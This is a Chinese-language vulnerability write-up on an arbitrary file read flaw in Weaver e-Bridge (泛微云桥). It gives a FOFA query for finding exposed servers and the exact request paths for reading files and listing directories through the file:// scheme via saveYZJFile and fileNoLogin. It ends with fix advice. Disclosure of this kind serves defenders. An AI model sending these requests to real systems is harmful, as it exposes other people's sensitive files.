任意文件读取
2021-03-28
2021-03-28
# 泛微云桥 - 任意文件读取
# 漏洞简介
泛微云桥(e-Bridge)是上海泛微公司在” 互联网 +” 的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。
# 影响版本
2018-2019 多个版本
# 资产查找
FOFA:
1 | "泛微云桥" |
# 漏洞复现
windows 为例
例如想读取 C:/Windows/win.ini
文件
访问 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/Windows/win.ini&fileExt=txt
获取文件 id
读取文件 /file/fileNoLogin/上面获取到的id
当然可以进行目录读取,我们只需将 downloadUrl
参数更换为绝对路径目录即可
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
目录读取: /file/fileNoLogin/cb25f92f19954e99903c610d96c6b7fa
自写垃圾检测
1 | import requests |
批量检测,不知道是没有找到原因,还是我脚本写的不对的原因,没有找到 linux 系统的
# 修复建议
0x01 关闭程序路由 /file/fileNoLogin
0x02 升级版本